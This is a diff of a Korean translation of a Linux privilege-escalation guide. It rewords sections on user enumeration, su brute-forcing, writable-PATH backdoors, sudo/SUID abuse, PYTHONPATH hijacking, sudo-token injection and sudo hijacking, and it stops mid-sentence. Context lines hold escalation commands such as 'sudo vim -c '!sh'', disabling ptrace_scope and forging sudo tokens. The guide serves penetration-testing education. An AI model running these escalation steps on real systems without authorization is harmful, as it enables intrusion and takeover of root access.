๋ฉ”์‹œ์ง€๋ฅผ ์†Œ์œ ํ•˜๊ณ , ์ „์†กํ•˜๊ณ , ์ˆ˜์‹ ํ•  ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์„ ์ž์„ธํžˆ ์„ค๋ช…ํ•ฉ๋‹ˆ๋‹ค. ์ง€์ •๋œ ์‚ฌ์šฉ์ž๋‚˜ ๊ทธ๋ฃน์ด ์—†๋Š” ์ •์ฑ…์€ ๋ณดํŽธ์ ์œผ๋กœ ์ ์šฉ๋˜๋ฉฐ, "๊ธฐ๋ณธ" ์ปจํ…์ŠคํŠธ ์ •์ฑ…์€ ๋‹ค๋ฅธ ํŠน์ • ์ •์ฑ…์— ์˜ํ•ด ๋‹ค๋ฃจ์–ด์ง€์ง€ ์•Š๋Š” ๋ชจ๋“  ๊ฒฝ์šฐ์— ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. ```xml @@ -629,7 +629,7 @@ timeout 1 tcpdump ### Generic Enumeration -๋‹น์‹ ์ด **๋ˆ„๊ตฌ**์ธ์ง€, ์–ด๋–ค **๊ถŒํ•œ**์ด ์žˆ๋Š”์ง€, ์‹œ์Šคํ…œ์— ์–ด๋–ค **์‚ฌ์šฉ์ž**๊ฐ€ ์žˆ๋Š”์ง€, ์–ด๋–ค ์‚ฌ์šฉ์ž๊ฐ€ **๋กœ๊ทธ์ธ**ํ•  ์ˆ˜ ์žˆ๋Š”์ง€, ๊ทธ๋ฆฌ๊ณ  ์–ด๋–ค ์‚ฌ์šฉ์ž๊ฐ€ **๋ฃจํŠธ ๊ถŒํ•œ**์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค: +Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:** ```bash #Info about me id || (whoami && groups) 2>/dev/null @@ -654,7 +654,7 @@ gpg --list-keys 2>/dev/null ### Big UID ์ผ๋ถ€ Linux ๋ฒ„์ „์€ **UID > INT_MAX**๋ฅผ ๊ฐ€์ง„ ์‚ฌ์šฉ์ž๊ฐ€ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ๋Š” ๋ฒ„๊ทธ์˜ ์˜ํ–ฅ์„ ๋ฐ›์•˜์Šต๋‹ˆ๋‹ค. ๋” ๋งŽ์€ ์ •๋ณด: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) ๋ฐ [here](https://twitter.com/paragonsec/status/1071152249529884674).\ -**๋‹ค์Œ๊ณผ ๊ฐ™์ด ์•…์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**: **`systemd-run -t /bin/bash`** +**์ด์šฉํ•˜๊ธฐ**: **`systemd-run -t /bin/bash`** ### Groups @@ -683,22 +683,22 @@ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/logi ``` ### ์•Œ๋ ค์ง„ ๋น„๋ฐ€๋ฒˆํ˜ธ -ํ™˜๊ฒฝ์˜ **์–ด๋–ค ๋น„๋ฐ€๋ฒˆํ˜ธ๋ผ๋„ ์•Œ๊ณ  ์žˆ๋‹ค๋ฉด** ํ•ด๋‹น ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ **๊ฐ ์‚ฌ์šฉ์ž๋กœ ๋กœ๊ทธ์ธํ•ด ๋ณด์‹ญ์‹œ์˜ค**. +ํ™˜๊ฒฝ์˜ **๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ๊ณ  ์žˆ๋‹ค๋ฉด** ๊ฐ ์‚ฌ์šฉ์ž๋กœ **๋กœ๊ทธ์ธํ•ด ๋ณด์„ธ์š”**. ### Su Brute -๋งŽ์€ ์†Œ์Œ์„ ๋ฐœ์ƒ์‹œํ‚ค๋Š” ๊ฒƒ์— ์‹ ๊ฒฝ ์“ฐ์ง€ ์•Š๊ณ  `su` ๋ฐ `timeout` ๋ฐ”์ด๋„ˆ๋ฆฌ๊ฐ€ ์ปดํ“จํ„ฐ์— ์กด์žฌํ•œ๋‹ค๋ฉด, [su-bruteforce](https://github.com/carlospolop/su-bruteforce)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž๋ฅผ ๋ฌด์ž‘์œ„๋กœ ๊ณต๊ฒฉํ•ด ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ -[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)๋„ `-a` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž๋ฅผ ๋ฌด์ž‘์œ„๋กœ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค. +์†Œ์Œ์ด ๋งŽ์ด ๋ฐœ์ƒํ•˜๋Š” ๊ฒƒ์„ ์‹ ๊ฒฝ ์“ฐ์ง€ ์•Š๊ณ  `su`์™€ `timeout` ๋ฐ”์ด๋„ˆ๋ฆฌ๊ฐ€ ์ปดํ“จํ„ฐ์— ์กด์žฌํ•œ๋‹ค๋ฉด, [su-bruteforce](https://github.com/carlospolop/su-bruteforce)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž๋ฅผ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)๋„ `-a` ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•ฉ๋‹ˆ๋‹ค. ## ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ PATH ๋‚จ์šฉ ### $PATH -$PATH์˜ **์–ด๋–ค ํด๋” ์•ˆ์— ์“ธ ์ˆ˜ ์žˆ๋Š” ๊ถŒํ•œ์ด ์žˆ๋‹ค๋ฉด** ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ํด๋” ์•ˆ์— **๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•˜์—ฌ** ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž(์ด์ƒ์ ์œผ๋กœ๋Š” root)์— ์˜ํ•ด ์‹คํ–‰๋  ๋ช…๋ น์˜ ์ด๋ฆ„์œผ๋กœ ์„ค์ •ํ•จ์œผ๋กœ์จ ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๋ช…๋ น์€ $PATH์—์„œ ๊ท€ํ•˜์˜ ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ํด๋”๋ณด๋‹ค **์•ž์„œ ์œ„์น˜ํ•œ ํด๋”์—์„œ ๋กœ๋“œ๋˜์ง€ ์•Š์•„์•ผ** ํ•ฉ๋‹ˆ๋‹ค. +$PATH์˜ **์–ด๋–ค ํด๋”์— ์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด** ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ํด๋” ์•ˆ์— **๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•˜์—ฌ** ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž(์ด์ƒ์ ์œผ๋กœ๋Š” root)์— ์˜ํ•ด ์‹คํ–‰๋  ๋ช…๋ น์˜ ์ด๋ฆ„์œผ๋กœ ์„ค์ •ํ•จ์œผ๋กœ์จ ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๋ช…๋ น์€ $PATH์—์„œ ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ํด๋”๋ณด๋‹ค **์ด์ „์˜ ํด๋”์—์„œ ๋กœ๋“œ๋˜์ง€ ์•Š์•„์•ผ** ํ•ฉ๋‹ˆ๋‹ค. ### SUDO ๋ฐ SUID -sudo๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ผ๋ถ€ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉ๋˜์—ˆ๊ฑฐ๋‚˜ suid ๋น„ํŠธ๊ฐ€ ์„ค์ •๋˜์–ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ์„ ์‚ฌ์šฉํ•˜์—ฌ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค: +sudo๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ผ๋ถ€ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉ๋˜๊ฑฐ๋‚˜ suid ๋น„ํŠธ๊ฐ€ ์„ค์ •๋˜์–ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ์„ ์‚ฌ์šฉํ•˜์—ฌ ํ™•์ธํ•˜์„ธ์š”: ```bash sudo -l #Check commands you can execute with sudo find / -perm -4000 2>/dev/null #Find all SUID binaries @@ -726,13 +726,13 @@ sudo vim -c '!sh' ``` ### SETENV -์ด ์ง€์‹œ์–ด๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๋ฌด์–ธ๊ฐ€๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๋™์•ˆ **ํ™˜๊ฒฝ ๋ณ€์ˆ˜๋ฅผ ์„ค์ •**ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค: +์ด ์ง€์‹œ์–ด๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๋ฌด์–ธ๊ฐ€๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๋™์•ˆ **ํ™˜๊ฒฝ ๋ณ€์ˆ˜๋ฅผ ์„ค์ •**ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค: ```bash $ sudo -l User waldo may run the following commands on admirer: (ALL) SETENV: /opt/scripts/admin_tasks.sh ``` -์ด ์˜ˆ์ œ๋Š” **HTB ๋จธ์‹  Admirer**๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•˜๋ฉฐ, ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋ฃจํŠธ๋กœ ์‹คํ–‰ํ•˜๋Š” ๋™์•ˆ ์ž„์˜์˜ ํŒŒ์ด์ฌ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ๋กœ๋“œํ•˜๊ธฐ ์œ„ํ•ด **PYTHONPATH ํ•˜์ด์žฌํ‚น**์— **์ทจ์•ฝ**ํ–ˆ์Šต๋‹ˆ๋‹ค: +์ด ์˜ˆ์ œ๋Š” **HTB ๋จธ์‹  Admirer**๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•˜๋ฉฐ, ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋ฃจํŠธ๋กœ ์‹คํ–‰ํ•  ๋•Œ ์ž„์˜์˜ ํŒŒ์ด์ฌ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ๋กœ๋“œํ•˜๊ธฐ ์œ„ํ•ด **PYTHONPATH ํ•˜์ด์žฌํ‚น**์— **์ทจ์•ฝ**ํ–ˆ์Šต๋‹ˆ๋‹ค: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` @@ -888,7 +888,7 @@ system("/bin/bash -p"); ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` -๊ทธ๊ฒƒ์€ ๋‹น์‹ ์ด ์ƒ์„ฑํ•œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์— `a_function_name`์ด๋ผ๋Š” ํ•จ์ˆ˜๊ฐ€ ํ•„์š”ํ•˜๋‹ค๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. +๊ทธ๊ฒƒ์€ ๋‹น์‹ ์ด ์ƒ์„ฑํ•œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์— `a_function_name`์ด๋ผ๋Š” ํ•จ์ˆ˜๊ฐ€ ์žˆ์–ด์•ผ ํ•จ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ### GTFOBins @@ -919,16 +919,16 @@ https://gtfoargs.github.io/ ๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•œ ์š”๊ตฌ ์‚ฌํ•ญ: -- ์ด๋ฏธ "_sampleuser_" ์‚ฌ์šฉ์ž๋กœ ์…ธ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Œ -- "_sampleuser_"๊ฐ€ **์ตœ๊ทผ 15๋ถ„** ์ด๋‚ด์— **`sudo`**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฌด์–ธ๊ฐ€๋ฅผ ์‹คํ–‰ํ–ˆ์Œ (๊ธฐ๋ณธ์ ์œผ๋กœ ์ด๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ์—†์ด `sudo`๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” sudo ํ† ํฐ์˜ ์ง€์† ์‹œ๊ฐ„์ž…๋‹ˆ๋‹ค) -- `cat /proc/sys/kernel/yama/ptrace_scope`๋Š” 0์ž„ -- `gdb`์— ์ ‘๊ทผ ๊ฐ€๋Šฅ (์—…๋กœ๋“œํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•จ) +- ์ด๋ฏธ "_sampleuser_" ์‚ฌ์šฉ์ž๋กœ ์…ธ์„ ๊ฐ€์ง€๊ณ  ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. +- "_sampleuser_"๊ฐ€ **์ตœ๊ทผ 15๋ถ„ ์ด๋‚ด์— `sudo`**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฌด์–ธ๊ฐ€๋ฅผ ์‹คํ–‰ํ–ˆ์Šต๋‹ˆ๋‹ค (๊ธฐ๋ณธ์ ์œผ๋กœ ์ด๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ  `sudo`๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” sudo ํ† ํฐ์˜ ์ง€์† ์‹œ๊ฐ„์ž…๋‹ˆ๋‹ค). +- `cat /proc/sys/kernel/yama/ptrace_scope`๋Š” 0์ž…๋‹ˆ๋‹ค. +- `gdb`์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค (์—…๋กœ๋“œํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค). -(์ผ์‹œ์ ์œผ๋กœ `ptrace_scope`๋ฅผ ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope`๋ฅผ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ `/etc/sysctl.d/10-ptrace.conf`๋ฅผ ์˜๊ตฌ์ ์œผ๋กœ ์ˆ˜์ •ํ•˜๊ณ  `kernel.yama.ptrace_scope = 0`์œผ๋กœ ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค) +(์ผ์‹œ์ ์œผ๋กœ `ptrace_scope`๋ฅผ ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope`๋ฅผ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ `/etc/sysctl.d/10-ptrace.conf`๋ฅผ ์˜๊ตฌ์ ์œผ๋กœ ์ˆ˜์ •ํ•˜๊ณ  `kernel.yama.ptrace_scope = 0`์œผ๋กœ ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.) ์ด ๋ชจ๋“  ์š”๊ตฌ ์‚ฌํ•ญ์ด ์ถฉ์กฑ๋˜๋ฉด, **๋‹ค์Œ ๋งํฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) -- **์ฒซ ๋ฒˆ์งธ ์ต์Šคํ”Œ๋กœ์ž‡**(`exploit.sh`)์€ _/tmp_์— `activate_sudo_token`์ด๋ผ๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ **์„ธ์…˜์—์„œ sudo ํ† ํฐ์„ ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (์ž๋™์œผ๋กœ ๋ฃจํŠธ ์…ธ์„ ์–ป์ง€ ์•Š์œผ๋ฉฐ, `sudo su`๋ฅผ ์‹คํ–‰ํ•ด์•ผ ํ•จ): +- **์ฒซ ๋ฒˆ์งธ ์ต์Šคํ”Œ๋กœ์ž‡**(`exploit.sh`)์€ _/tmp_์— `activate_sudo_token`์ด๋ผ๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ **์„ธ์…˜์—์„œ sudo ํ† ํฐ์„ ํ™œ์„ฑํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (์ž๋™์œผ๋กœ ๋ฃจํŠธ ์…ธ์„ ์–ป์ง€ ์•Š์œผ๋ฉฐ, `sudo su`๋ฅผ ์‹คํ–‰ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค): ```bash bash exploit.sh /tmp/activate_sudo_token @@ -946,8 +946,8 @@ sudo su ``` ### /var/run/sudo/ts/\ -ํ•ด๋‹น ํด๋” ๋˜๋Š” ํด๋” ๋‚ด์— ์ƒ์„ฑ๋œ ํŒŒ์ผ์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ์ด์ง„ ํŒŒ์ผ [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools)์„ ์‚ฌ์šฉํ•˜์—ฌ **์‚ฌ์šฉ์ž ๋ฐ PID์— ๋Œ€ํ•œ sudo ํ† ํฐ์„ ์ƒ์„ฑ**ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ -์˜ˆ๋ฅผ ๋“ค์–ด, _/var/run/sudo/ts/sampleuser_ ํŒŒ์ผ์„ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๊ณ , PID 1234๋กœ ํ•ด๋‹น ์‚ฌ์šฉ์ž๋กœ ์‰˜์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋ฉด, ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ ํ•„์š” ์—†์ด **sudo ๊ถŒํ•œ์„ ์–ป์„ ์ˆ˜** ์žˆ์Šต๋‹ˆ๋‹ค. +ํ•ด๋‹น ํด๋” ๋˜๋Š” ํด๋” ๋‚ด์— ์ƒ์„ฑ๋œ ํŒŒ์ผ ์ค‘ ํ•˜๋‚˜์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ๋ฐ”์ด๋„ˆ๋ฆฌ [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools)๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ **์‚ฌ์šฉ์ž ๋ฐ PID์— ๋Œ€ํ•œ sudo ํ† ํฐ์„ ์ƒ์„ฑ**ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ +์˜ˆ๋ฅผ ๋“ค์–ด, _/var/run/sudo/ts/sampleuser_ ํŒŒ์ผ์„ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๊ณ , PID 1234๋กœ ํ•ด๋‹น ์‚ฌ์šฉ์ž๋กœ ์‰˜์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋ฉด, ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ ํ•„์š” ์—†์ด ๋‹ค์Œ์„ ์ˆ˜ํ–‰ํ•˜์—ฌ **sudo ๊ถŒํ•œ์„ ์–ป์„ ์ˆ˜** ์žˆ์Šต๋‹ˆ๋‹ค: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` @@ -979,9 +979,9 @@ permit nopass demo as root cmd vim ``` ### Sudo Hijacking -๋งŒ์•ฝ **์‚ฌ์šฉ์ž๊ฐ€ ์ผ๋ฐ˜์ ์œผ๋กœ ๋จธ์‹ ์— ์—ฐ๊ฒฐํ•˜๊ณ  `sudo`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ค๋Š”** ๊ฒƒ์„ ์•Œ๊ณ  ์žˆ๊ณ , ๊ทธ ์‚ฌ์šฉ์ž ์ปจํ…์ŠคํŠธ ๋‚ด์—์„œ ์‰˜์„ ์–ป์—ˆ๋‹ค๋ฉด, **์ƒˆ๋กœ์šด sudo ์‹คํ–‰ ํŒŒ์ผ์„ ์ƒ์„ฑ**ํ•˜์—ฌ ๋ฃจํŠธ๋กœ์„œ ๋‹น์‹ ์˜ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•œ ๋‹ค์Œ ์‚ฌ์šฉ์ž์˜ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, **์‚ฌ์šฉ์ž ์ปจํ…์ŠคํŠธ์˜ $PATH๋ฅผ ์ˆ˜์ •**ํ•˜์—ฌ (์˜ˆ๋ฅผ ๋“ค์–ด .bash_profile์— ์ƒˆ๋กœ์šด ๊ฒฝ๋กœ๋ฅผ ์ถ”๊ฐ€ํ•˜์—ฌ) ์‚ฌ์šฉ์ž๊ฐ€ sudo๋ฅผ ์‹คํ–‰ํ•  ๋•Œ ๋‹น์‹ ์˜ sudo ์‹คํ–‰ ํŒŒ์ผ์ด ์‹คํ–‰๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. +๋งŒ์•ฝ **์‚ฌ์šฉ์ž๊ฐ€ ์ผ๋ฐ˜์ ์œผ๋กœ ๋จธ์‹ ์— ์—ฐ๊ฒฐํ•˜๊ณ  `sudo`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ค๋Š”** ๊ฒƒ์„ ์•Œ๊ณ  ์žˆ๊ณ , ๊ทธ ์‚ฌ์šฉ์ž ์ปจํ…์ŠคํŠธ ๋‚ด์—์„œ ์‰˜์„ ์–ป์—ˆ๋‹ค๋ฉด, **์ƒˆ๋กœ์šด sudo ์‹คํ–‰ ํŒŒ์ผ์„ ์ƒ์„ฑ**ํ•˜์—ฌ ๋ฃจํŠธ๋กœ์„œ ๋‹น์‹ ์˜ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•˜๊ณ  ๊ทธ ๋‹ค์Œ ์‚ฌ์šฉ์ž์˜ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, **์‚ฌ์šฉ์ž ์ปจํ…์ŠคํŠธ์˜ $PATH๋ฅผ ์ˆ˜์ •**ํ•˜์—ฌ (์˜ˆ: .bash_profile์— ์ƒˆ๋กœ์šด ๊ฒฝ๋กœ ์ถ”๊ฐ€) ์‚ฌ์šฉ์ž๊ฐ€ sudo๋ฅผ ์‹คํ–‰ํ•  ๋•Œ ๋‹น์‹ ์˜ sudo ์‹คํ–‰ ํŒŒ์ผ์ด ์‹คํ–‰๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. -์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค๋ฅธ ์‰˜(๋ฐฐ์‹œ๊ฐ€ ์•„๋‹Œ)์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ, ์ƒˆ๋กœ์šด ๊ฒฝ๋กœ๋ฅผ ์ถ”๊ฐ€ํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค๋ฅธ ํŒŒ์ผ์„ ์ˆ˜์ •ํ•ด์•ผ ํ•œ๋‹ค๋Š” ์ ์— ์œ ์˜ํ•˜์„ธ์š”. ์˜ˆ๋ฅผ ๋“ค์–ด[ sudo-piggyback](https://github.com/APTy/sudo-piggyback)๋Š” `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`๋ฅผ ์ˆ˜์ •ํ•ฉ๋‹ˆ๋‹ค. [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)์—์„œ ๋˜ ๋‹ค๋ฅธ ์˜ˆ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค๋ฅธ ์‰˜(๋ฐฐ์‹œ๊ฐ€ ์•„๋‹Œ)์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ, ์ƒˆ๋กœ์šด ๊ฒฝ๋กœ๋ฅผ ์ถ”๊ฐ€ํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค๋ฅธ ํŒŒ์ผ์„ ์ˆ˜์ •ํ•ด์•ผ ํ•œ๋‹ค๋Š” ์ ์— ์œ ์˜ํ•˜์„ธ์š”. ์˜ˆ๋ฅผ ๋“ค์–ด [sudo-piggyback](https://github.com/APTy/sudo-piggyback)๋Š” `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`๋ฅผ ์ˆ˜์ •ํ•ฉ๋‹ˆ๋‹ค. [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)์—์„œ ๋˜ ๋‹ค๋ฅธ ์˜ˆ๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๊ฒƒ์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash @@ -1006,7 +1006,7 @@ sudo ls ์ด๋Š” `/etc/ld.so.conf.d/*.conf`์˜ ๊ตฌ์„ฑ ํŒŒ์ผ์ด ์ฝํž ๊ฒƒ์ž„์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ์ด ๊ตฌ์„ฑ ํŒŒ์ผ์€ **๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ**๊ฐ€ **๊ฒ€์ƒ‰**๋  **๋‹ค๋ฅธ ํด๋”**๋ฅผ ๊ฐ€๋ฆฌํ‚ต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, `/etc/ld.so.conf.d/libc.conf`์˜ ๋‚ด์šฉ์€ `/usr/local/lib`์ž…๋‹ˆ๋‹ค. **์ด๋Š” ์‹œ์Šคํ…œ์ด `/usr/local/lib` ๋‚ด์—์„œ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ๊ฒ€์ƒ‰ํ•  ๊ฒƒ์ž„์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค.** -์–ด๋–ค ์ด์œ ๋กœ๋“  **์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค์Œ ๊ฒฝ๋กœ ์ค‘ ํ•˜๋‚˜์— ์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, `/etc/ld.so.conf.d/` ๋‚ด์˜ ๋ชจ๋“  ํŒŒ์ผ ๋˜๋Š” `/etc/ld.so.conf.d/*.conf` ๋‚ด์˜ ๊ตฌ์„ฑ ํŒŒ์ผ ๋‚ด์˜ ๋ชจ๋“  ํด๋”, ๊ทธ๋Š” ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ +์–ด๋–ค ์ด์œ ๋กœ๋“  **์‚ฌ์šฉ์ž๊ฐ€ ๋‹ค์Œ ๊ฒฝ๋กœ ์ค‘ ํ•˜๋‚˜์— ์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, `/etc/ld.so.conf.d/` ๋‚ด์˜ ๋ชจ๋“  ํŒŒ์ผ ๋˜๋Š” `/etc/ld.so.conf.d/*.conf` 